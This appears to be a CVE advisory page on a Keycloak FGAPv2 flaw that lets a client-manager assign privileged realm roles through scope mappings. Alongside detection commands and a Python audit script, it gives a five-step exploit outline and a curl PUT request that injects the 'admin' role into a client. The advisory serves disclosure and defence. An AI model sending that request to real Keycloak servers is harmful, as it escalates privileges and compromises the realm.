The vulnerability resides in Keycloak's Fine-Grained Admin Permissions (FGAPv2). An administrator holding only client management permissions can exploit a flaw in the scope mapping functionality: by crafting a specific request, they can assign any realm role, including highly privileged ones such as `admin` or `manage-realm`, to a client's scope mapping, bypassing the intended authorization checks. When a user authenticates to the modified client, the injected role is projected into their token, resulting in unauthorized privilege escalation within the Keycloak realm. The attack vector is network-based and of low complexity, with high impact on confidentiality and integrity. The CVSS base score is 7.3.
DailyCVE Form:
Platform: Keycloak FGAPv2
Version: All vulnerable
Vulnerability: Privilege escalation
Severity: High (CVSS:7.3)
Date: 2026-05-28
Prediction: 2026-06-10
What Undercode Say:
Analyzing the vulnerability, Undercode suggests the following checks:

```bash
# Check the running Keycloak version (the serverinfo endpoint requires an admin token)
keycloak_version=$(curl -s -H "Authorization: Bearer $ADMIN_TOKEN" \
  http://localhost:8080/admin/serverinfo | jq -r '.systemInfo.version')
echo "Keycloak Version: $keycloak_version"

# Identify clients with FGAPv2 enabled
curl -s -H "Authorization: Bearer $ADMIN_TOKEN" http://localhost:8080/admin/realms/master/clients \
  | jq -r '.[] | select(.fineGrainedAccessPolicy != null) | .clientId'

# Check a client's realm scope mappings for privileged roles
curl -s -H "Authorization: Bearer $ADMIN_TOKEN" \
  "http://localhost:8080/admin/realms/master/clients/$CLIENT_ID/scope-mappings/realm" \
  | jq '.[] | select(.name | test("admin|manage-realm"))'
```
Exploit:
An attacker with limited permissions can:
1. Obtain an access token for a user with the `manage-clients` role.
2. Identify a target client.
3. Send a PUT request to add a high-privilege realm role to the client's scope mapping.
4. Wait for a privileged user to authenticate to the modified client.
5. Capture their token containing the injected role.
Example exploit using curl:

```bash
# Add the 'admin' realm role to client 'evil-client' scope-mapping
curl -X PUT "http://localhost:8080/admin/realms/master/clients/EVIL_CLIENT_ID/scope-mappings/realm" \
  -H "Authorization: Bearer $LIMITED_ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '[{"id":"admin-role-id","name":"admin"}]'
```
Protection:
Upgrade: Apply the patch from Red Hat when available.
Restrict Permissions: Do not assign `manage-clients` to untrusted users.
Audit: Regularly review client scope mappings for unauthorized roles.
Network Controls: Limit access to Keycloak admin API.
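To make the "Audit" item above repeatable, here is an added example (not code from the advisory or from the Keycloak project) that walks every client in a realm, pulls its realm scope mapping from the admin REST endpoint used throughout this page, and flags clients that would project a privileged realm role into tokens. The `PRIVILEGED_ROLES` set and the `SAMPLE_*` data are constructed for the example; `fullScopeAllowed` is the standard client representation flag, which is checked because a client with full scope projects every realm role without any explicit mapping.

```python
import json
import urllib.request

# Realm roles whose appearance in a client's scope mapping warrants review
# (set chosen for this example; extend it with the realm's own privileged roles).
PRIVILEGED_ROLES = frozenset({"admin", "create-realm"})

def flag_scope_mappings(clients, mappings_by_client, watch=PRIVILEGED_ROLES):
    """Return one finding per client that would project a privileged realm role."""
    findings = []
    for client in clients:
        # fullScopeAllowed projects every realm role regardless of explicit
        # mappings, so such a client is reported even with an empty mapping.
        if client.get("fullScopeAllowed"):
            findings.append({"clientId": client["clientId"], "reason": "fullScopeAllowed"})
            continue
        mapped = {r.get("name") for r in mappings_by_client.get(client["id"], [])}
        for role in sorted(mapped & watch):
            findings.append({"clientId": client["clientId"], "reason": "realm role " + role})
    return findings

def admin_get(base_url, token, path):
    """GET a Keycloak admin REST path with a bearer token and decode the JSON body."""
    req = urllib.request.Request(base_url + path, headers={"Authorization": "Bearer " + token})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def audit_realm(base_url, realm, token):
    """Fetch every client's realm scope mapping from a live server and flag it."""
    clients = admin_get(base_url, token, f"/admin/realms/{realm}/clients")
    mappings = {c["id"]: admin_get(base_url, token,
                f"/admin/realms/{realm}/clients/{c['id']}/scope-mappings/realm")
                for c in clients}
    return flag_scope_mappings(clients, mappings)

# Constructed sample data standing in for the two admin API responses above.
SAMPLE_CLIENTS = [
    {"id": "c1", "clientId": "billing-app", "fullScopeAllowed": False},
    {"id": "c2", "clientId": "evil-client", "fullScopeAllowed": False},
    {"id": "c3", "clientId": "legacy-portal", "fullScopeAllowed": True},
]
SAMPLE_MAPPINGS = {
    "c1": [{"id": "r1", "name": "offline_access"}],
    "c2": [{"id": "r2", "name": "admin"}, {"id": "r1", "name": "offline_access"}],
    "c3": [],
}
```

Run `audit_realm("http://localhost:8080", "master", ADMIN_TOKEN)` against a live server, or `flag_scope_mappings(SAMPLE_CLIENTS, SAMPLE_MAPPINGS)` to see the two sample findings offline.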
Impact:
Privilege Escalation: Any user authenticating to a modified client gains high privileges.
Data Breach: Unauthorized access to sensitive data.
System Compromise: Full realm compromise is possible.
Compliance: Violations of least privilege and access control policies.
Sources:
Reported By: nvd.nist.gov

